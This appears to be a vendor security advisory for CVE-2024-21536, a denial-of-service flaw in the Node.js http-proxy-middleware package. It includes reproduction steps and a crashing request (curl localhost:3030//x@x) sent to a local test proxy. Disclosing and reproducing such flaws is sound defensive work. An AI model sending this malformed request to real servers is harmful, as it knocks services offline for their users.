Overview
Http Proxy Middleware is a package for Node.js proxying. It allows users to configure proxy middleware for connect, express, browser-sync and more.
A Denial of Service (DoS) vulnerability (CVE-2024-21536) has been identified in the http-proxy-middleware package caused by an UnhandledPromiseRejection error thrown by micromatch. An attacker could kill the Node.js process and crash the server by making requests to certain paths.
Per OWASP: The Denial of Service (DoS) attack is focused on making a resource (site, application, server) unavailable for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical, or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may cease to be available to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited, or the way the service handles resources it uses.
This issue affects Http Proxy Middleware versions lower than 2.0.7 or greater than or equal to 3.0.0 and lower than 3.0.3.
Details
Module Info
- Product: Http Proxy Middleware
- Affected packages: http-proxy-middleware
- Affected versions: <2.0.7, >=3.0.0 <3.0.3
- GitHub repository: https://github.com/chimurai/http-proxy-middleware
- Published packages: https://www.npmjs.com/package/http-proxy-middleware
- Package manager: npm
- Fixed in: Web Essentials NES Http Proxy Middleware v0.19.3
Vulnerability Info
This High-severity vulnerability is found in the http-proxy-middleware package, affecting versions <2.0.7, >=3.0.0 <3.0.3.
On v1 and v2 of http-proxy-middleware, it is possible to cause the server to crash with TypeError: Cannot read properties of null (reading 'indexOf') (from matchSingleStringPath). The crash occurs when an attacker requests a malformed URL (such as localhost:3030//x@x): the request path is parsed to null, and matchSingleStringPath then calls indexOf on something that isn't actually a string. As soon as the code calls indexOf on null, it throws the TypeError.
Steps To Reproduce
1. Using Node v22, create a new project with the following dependencies:
    "devDependencies": {
      "express": "^4.17.1",
      "http-proxy-middleware": "0.19.2"
    }
2. Add an app.js file and configure it to use http-proxy-middleware:
    const express = require('express');
    const proxy = require('http-proxy-middleware');
    const app = express();
    const port = 3030;
    // Logging middleware for proxy
    app.use((req, res, next) => {
      console.log(`[Proxy] Request received: ${req.method} ${req.originalUrl}`);
      next();
    });
    app.use(
      '',
      proxy({
        target: 'http://localhost:3031',
        onProxyReq: (proxyReq, req) => {
          console.log(
            `[Proxy] Forwarding request to backend: ${req.method} ${req.url}`
          );
        },
        onProxyRes: (proxyRes, req) => {
          console.log(
            `[Proxy] Received response from backend for: ${req.method} ${req.url}`
          );
        },
        onError: (err, req, res) => {
          console.error(`[Proxy] Error occurred: ${err.message}`);
          res.status(500).send('Proxy encountered an error');
        },
      })
    );
    app.listen(port, () => {
      console.log(`Example app listening at http://localhost:${port}`);
    });
3. Add a backend.js file and configure it to be the destination server:
    const express = require('express');
    const backend = express();
    const port = 3031;
    // Logging middleware for backend
    backend.use((req, res, next) => {
      console.log(`[Backend] Request received: ${req.method} ${req.originalUrl}`);
      next();
    });
    backend.get('/', (req, res) => {
      res.send('Backend response: OK');
    });
    backend.listen(port, () => {
      console.log(`[Backend] listening at http://localhost:${port}`);
    });
4. Start the servers: node app.js and node backend.js
5. Execute the malicious curl request: curl localhost:3030//x@x. Note the error response from the proxy server:
    TypeError: Cannot read properties of null (reading 'indexOf')
Proof Of Concept
A full reproduction with code similar to the above can be found here:
Credits
- Marc Hassan (finder)
Mitigation
Version 0.19.x of http-proxy-middleware has not received a patch for this CVE. For more information see the list of patched versions here.
Users of the affected components should apply one of the following mitigations:
- Migrate affected applications away from the affected versions of http-proxy-middleware.
- Leverage a commercial support partner like HeroDevs for post-EOL security support.